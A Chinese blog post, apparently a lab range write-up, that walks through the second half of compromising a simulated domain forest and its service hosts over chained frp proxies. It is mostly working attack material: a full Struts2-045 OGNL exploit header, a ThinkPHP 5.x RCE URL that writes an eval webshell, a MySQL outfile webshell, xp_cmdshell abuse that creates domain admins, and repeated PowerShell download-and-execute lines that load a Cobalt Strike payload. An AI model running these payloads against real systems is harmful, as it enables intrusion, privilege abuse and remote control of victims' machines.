来自FreeBuf.COM
本文目录0x09 攻击独立域控服务器一、建立二级frp二、信息收集三、MSSQL命令执行利用并上线CS四、信息收集0x10 攻击独立域财务服务器一、建立三级frp二、mysql弱口令利用并上线CS0x11 攻击JBOSS独立机一、信息收集二、JMX Console未授权访问漏洞利用并上线CS0x12 攻击ThinkPHP独立机一、信息收集二、ThinkPHP5.x远程代码执行漏洞利用并上线CS0x13 攻击Shiro独立机一、信息收集二、shiro反序列化利用并上线CS0x14 攻击Struts2独立机一、信息收集二、Struts2-045漏洞利用并上线CS0x15 攻击WebSphere独立机一、信息收集二、弱口令利用并上线CS0x16 总结接上篇的实战渗透域森林+服务森林(上),上篇文章中只讲到了一级和二级代理、域渗透常规操作以及部分服务攻防,本篇就主要涉及到frp的三级代理和服务攻防的相关知识了。
目录
0x09 攻击独立域控服务器
之前在子域中子域中发现存在10.12.10.0/24网段,通过nbtscan发现存在10.12.10.3这台主机
一、建立二级frp
上线CS需要建立二级frp通道
(一)相关配置子域域控frpc.ini配置如下
[common]server_addr = 10.10.10.101server_port = 13000[http_proxy]type = tcpremote_port = 1097plugin = socks5Web服务器frps.ini配置如下
[common]bind_addr = 10.10.10.101bind_port = 13000Web服务器frpc.ini配置如下
[common]server_addr = 1.117.58.131server_port = 13000[http_proxy]type = tcplocal_ip = 10.10.10.101local_port = 1097remote_port = 1097公网服务器frps.ini配置如下
[common]bind_addr = 0.0.0.0bind_port = 13000(二)命令执行首先先开启服务端的frp,在web服务器和公网服务器下执行如下命令
frps.exe -c frps.ini./frps -c frps.ini截屏2021-09-01 下午10.51.42之后在子域域控中执行
frpc.exe -c frpc.ini截屏2021-09-01 下午10.53.01最后在web服务器中执行
frpc.exe -c frpc.ini截屏2021-09-01 下午10.53.50在proxychains添加代理
vim /etc/proxychains.conf截屏2021-09-01 下午10.57.00二、信息收集
通过fscan对10.12.10.3进行扫描扫描结果存在MSSQL数据库,账号密码为sa/admin@123
三、MSSQL命令执行利用并上线CS
首先使用MSF针对SQLserver的利用模块
msfconsole# 设置代理msf > setg Proxies socks5:1.117.58.131:1097msf > setg ReverseAllowProxy true# 使用攻击模块msf > use admin/mssql/mssql_execmsf > set CMD whoamimsf > set RHOSTS 10.12.10.3msf > set PASSWORD admin@123msf > run之后创建用户
msf > set CMD net user mac 123QWEasd /add msf > set CMD net localgroup administrators mac /addimage但是报错,于是通过代理使用navicat连接mssql 查询xp_cmd是否开启
select count(*) from master.dbo.sysobjects where xtype=x and name=xp_cmdshell返回1说明开启如果没有开启可以执行以下命令进行开启
EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell,1;RECONFIGURE;命令执行,添加用户并添加到admins组
master..xp_cmdshell net user mac /domain #发现mac用户已添加master..xp_cmdshell net group "domain admins" mac /add /domain于是在子域控中建立ipc$
shell net use \\10.12.10.3\ipc$ "123QWEasd" /user:10.12.10.3\macdir \\10.12.10.3\c$image在子域控中设置中转监听同时生成mac4.exe
将mac4.exe上传到子域控中,通过IPC复制到10.12.10.3
shell copy mac4.exe \\10.12.10.3\c$shell dir \\10.12.10.3\c$image可以通过navicat连接数据库执行命令上线CS
master..xp_cmdshell cd C:\ & mac4.exe也可以通过wmiexec来执行命令上线
proxychains python3 wmiexec.py mac:[email protected]成功上线CS
四、信息收集
发现该IP上存在两张网卡,即有两个网段
10.12.10.320.20.20.10通过nbtscan扫描20.20.20.0/24网段
20.20.20.10 DULI\WIN-LOH5RS7UNDP SHARING DC20.20.20.101 WORKGROUP\WIN-AMJ9T9TL123 SHARING20.20.20.102 -no name-20.20.20.103 -no name-20.20.20.104 -no name-20.20.20.105 -no name-20.20.20.199 DULI\CAIWU SHARING通过fscan扫描20.20.20.0/24网段
WebTitle::5985 404 NoneWebTitle::47001 404 NoneNetInfo:[*]20.20.20.103 [->]WIN-AMJ9T9TL123 [->]20.20.20.10320.20.20.10 MS17-010 (Windows Server 2008 HPC Edition 7601 Service Pack 1)WebTitle::47001 404 NoneWebTitle::5985 404 NoneWebTitle::9060 404 NoneWebTitle::9080 404 NoneNetInfo:[*]20.20.20.105 [->]WIN-AMJ9T9TL123 [->]20.20.20.105WebTitle::47001 404 NoneWebTitle:1:8080 200 Welcome to JBoss ASNetInfo:[*]20.20.20.104 [->]WIN-AMJ9T9TL123 [->]20.20.20.104NetInfo:[*]20.20.20.101 [->]WIN-AMJ9T9TL123 [->]20.20.20.101WebTitle::9443 404 NoneWebTitle::9043 404 Nonemssql:20.20.20.10:1433:sa admin@123WebTitle:4:5985 404 NoneWebTitle:4:47001 404 NoneWebTitle:4:8080 200 Apache Tomcat/8.5.65WebTitle:1:47001 404 NoneWebTitle:1:5985 404 NoneWebTitle::8880 500 NoneNetInfo:[*]20.20.20.199 [->]caiwu [->]20.20.20.199 [->]2002:1414:14c7::1414:14c7NetInfo:[*]20.20.20.102 [->]WIN-AMJ9T9TL123 [->]20.20.20.10220.20.20.199 MS17-010 (Windows 7 Professional 7601 Service Pack 1)WebTitle:2:5985 404 NoneWebTitle:2:47001 404 Nonemysql:20.20.20.199:3306:root rootWebTitle:2:80 200 NoneWebTitle::80 200 phpStudy 鎺㈤拡 2014通过cscan扫描20.20.20.0/24网段
20.20.20.10 MS17-010 WIN-LOH5RS7UNDP dul.com [Win 2008 HPC Edition 7601 SP 1]20.20.20.101 WIN-AMJ9T9TL123 [Win 2016 Standard 14393]20.20.20.102 WIN-AMJ9T9TL123 [Win 2016 Standard 14393]20.20.20.104 WIN-AMJ9T9TL123 [Win 2016 Standard 14393]20.20.20.103 WIN-AMJ9T9TL123 [Win 2016 Standard 14393]20.20.20.105 WIN-AMJ9T9TL123 [Win 2016 Standard 14393]20.20.20.199 MS17-010 CAIWU dul.com [Win 7 Professional 7601 SP 1]0x10 攻击独立域财务服务器
打击20.20.20.0/24网段首先需要建立三级frp
一、建立三级frp
(一)相关配置独立域控frpc.ini配置如下
[common]server_addr = 10.12.10.5server_port = 14000[http_proxy]type = tcpremote_port = 1098plugin = socks5子域控frps.ini配置如下
[common]bind_addr = 10.12.10.5bind_port = 14000子域控frpc.ini配置如下
[common]server_addr = 10.10.10.101server_port = 14000[http_proxy]type = tcplocal_ip = 10.12.10.5local_port = 1098remote_port = 1098Web服务器frps.ini配置如下
[common]bind_addr = 10.10.10.101bind_port = 14000Web服务器frpc.ini配置如下
[common]server_addr = 1.117.58.131server_port = 14000[http_proxy]type = tcplocal_ip = 10.10.10.101local_port = 1098remote_port = 1098公网服务器frps.ini配置如下
[common]bind_addr = 0.0.0.0bind_port = 14000(二)命令执行首先先开启服务端的frp,在web服务器、公网服务器、子域控下执行如下命令
frps.exe -c frps.ini./frps -c frps.ini之后在独立域控下执行如下命令
frpc.exe -c frpc.ini之后在子域控下执行如下命令
frpc.exe -c frpc.ini之后在web服务器下执行如下命令
frpc.exe -c frpc.ini在proxychains添加代理
vim /etc/proxychains.confimage二、mysql弱口令利用并上线CS
通过访问
proxychains firefox /phpmyadmin但是加载太慢了,它的默认口令为root/root,利用方法和之前一样
这里选择MSF爆破弱口令
msfconsolemsf > use auxiliary/scanner/mysql/mysql_loginmsf > setg Proxies socks5:1.117.58.131:1098msf > setg ReverseAllowProxy truemsf > set rhosts 20.20.20.199msf > set PASSFILE xxxmsf > exploit得到弱口令root/root,直接登录
proxychains mysql -u root -proot -h20.20.20.199查看是否拥有写入文件的权限和写入位置,空表示可以写入任意位置
show global variables like %secure_file_priv%;写入木马到网站目录下
select <?php @eval($_POST[mac]);?> into outfile C:/phpStudy/WWW/mac2.php;image设置蚁剑代理,连接/mac2.php,成功上线
设置中转监听,并生成木马mac5.exe
在蚁剑中上传mac5.exe并执行
0x11 攻击JBOSS独立机
一、信息收集
通过fscan发现1:8080
proxychains firefox 1:8080为JBOSS中间件,可能存在JMX Console未授权访问漏洞
二、JMX Console未授权访问漏洞利用并上线CS
找到Jboss-system中的MainDepolyer
在20.20.20.199的http界面中上传war包
打包war包
jar -cvf mac.war "mac.jsp"在JBOSS中远程(deploy)部署/mac.war,点击invoke访问网址1:8080/mac/mac.jsp,已成功部署
执行以下命令上线CS
powershell (new-object System.Net.WebClient).DownloadFile(/mac5.exe,mac5.exe);start-process mac5.exe0x12 攻击ThinkPHP独立机
一、信息收集
通过fscan扫描到该主机存在http服务,通过代理进行访问
proxychains firefox 2image显示为ThinkPHP v5框架,可能存在远程代码执行漏洞
二、ThinkPHP5.x远程代码执行漏洞利用并上线CS
首先验证是否存在该漏洞
2/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1%20and%20it%27ll%20execute%20the%20phpinfo跳出phpinfo界面说明存在该漏洞
通过任意代码执行写入shell 小马源码:
<?php @eval($_POST[mac]);?>url编码后:
%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%6d%61%63%5d%29%3b%3f%3e将参数进行替换
2/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=mac.php&vars[1][]=%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%6d%61%63%5d%29%3b%3f%3e截屏2021-09-02 上午1.45.33返回数值就说明执行成功
通过蚁剑连接2/mac.php,成功上线
上传mac5.exe并成功执行,上线CS
0x13 攻击Shiro独立机
一、信息收集
通过fscan扫描到该主机存在http服务,通过代理进行访问
proxychains firefox :8080image为tomcat界面,访问控制界面出错,对其下目录进行扫描,发现:8080/shiro,为Shiro框架
二、shiro反序列化利用并上线CS
通过shiro-1.2.4-rce对其进行利用
git clone https://github.com/zhzyker/shiro-1.2.4-rce.gitcd shiro-1.2.4-rceproxychains python3 shiro-1.2.4_rce.py :8080/shiro/login.jspimage执行powershell命令上线CS
powershell (new-object System.Net.WebClient).DownloadFile(/mac5.exe,mac5.exe);start-process mac5.exepowershell.exe (new-object System.Net.WebClient).DownloadFile(/mac5.exe,mac5.exe);start-process mac5.exepowershell (new-object System.Net.WebClient).DownloadFile(/mac5.exe,mac5.exe);start-process mac5.exe这台一直出现问题,无法上线
0x14 攻击Struts2独立机
一、信息收集
通过fscan扫描8080端口存在web服务,访问4:8080
proxychains firefox 4:8080image为Tomcat界面,访问目录S2-045,判断可能存在Struts2系列框架漏洞
二、Struts2-045漏洞利用并上线CS
通过burp抓取数据包,需先设置代理
POST /S2-045/fileupload/doUpload.action HTTP/1.1Host: 20.20.20.104:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/ Firefox/89.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: %{(#nike=multipart/form-data).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=powershell -Command (new-object System.Net.WebClient).DownloadFile(\/mac5.exe\,\mac5.exe\);start-process mac5.exe).(#iswin=(@java.lang.System@getProperty(os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} boundary=---------------------------Content-Length: 344Origin: 4:8080Connection: closeReferer: 4:8080/S2-045/fileupload/upload.actionCookie: JSESSIONID=7B84132FC14F461D411AEBE4DA902C2AAUpgrade-Insecure-Requests: 1-----------------------------Content-Disposition: form-data; name="upload"; filename=""Content-Type: application/octet-stream-----------------------------Content-Disposition: form-data; name="caption"aaa-------------------------------image执行后,成功上线CS
0x15 攻击WebSphere独立机
一、信息收集
通过railgun工具扫描端口信息,发现9060和9043是WebSphere使用的端口 访问:9043/ibm/console/logon.jsp
proxychains firefox :9043/ibm/console/logon.jspimage二、弱口令利用并上线CS
通过弱口令admin/admin@123登录,存在WebSphere中间件漏洞选择新增企业版应用,之后部署war包之后一直下一步,直到选填路径完成并保存,选择刚刚部署的war包开始运行
访问:9080/mac/mac.jsp
执行命令上线CS
powershell (new-object System.Net.WebClient).DownloadFile(/mac5.exe,mac5.exe);start-process mac5.exe截屏2021-09-02 上午4.30.51最后成功上线CS
0x16 总结
本次域渗透+服务攻防的通关让我对内网渗透的理解更加透彻,其中建立代理是打内网的关键,其他的话和平时渗透差不多。感谢大家看完这一长篇的笔记,欢迎大家在评论区留言交流。最后附上通关图。原文地址:
本文作者:特mac0x01, 转载请注明来自FreeBuf.COM
整理:亿人安全
推荐阅读
【内网渗透系列】|19-内网渗透之域环境渗透测试过程
【内网渗透系列】|18-一次模拟从外网到内网漫游的实验过程
【内网渗透系列】|17-从公网渗透到内网、拿域控(附:靶场下载)
【内网渗透系列】|16-三层网络渗透测试实验(文末附 内网渗透靶场 下载方式)
【内网渗透系列】|15-内网渗透、横向攻击思路(文末赠内网渗透书籍)
【内网渗透系列】|14-内网穿透之多层代理
【内网渗透系列】|13-哈希传递攻击利用(Pass The Hash)
ATT&CK实战系列-红队评估 (一)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (二)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (三)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (四)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (五)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (六)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (七)Vulnstack三层网络域渗透靶场
【内网渗透系列】1-暗月出师三层网络靶机7 writeup(附带【其他内网靶场】链接地址)
域渗透之(白银票据利用)
域渗透之黄金票据的利用
【内网渗透系列】- 获取windows hash的几种方式(文中附工具下载链接)
内网穿透 | 一文让你熟练运用内网穿透(步骤详细)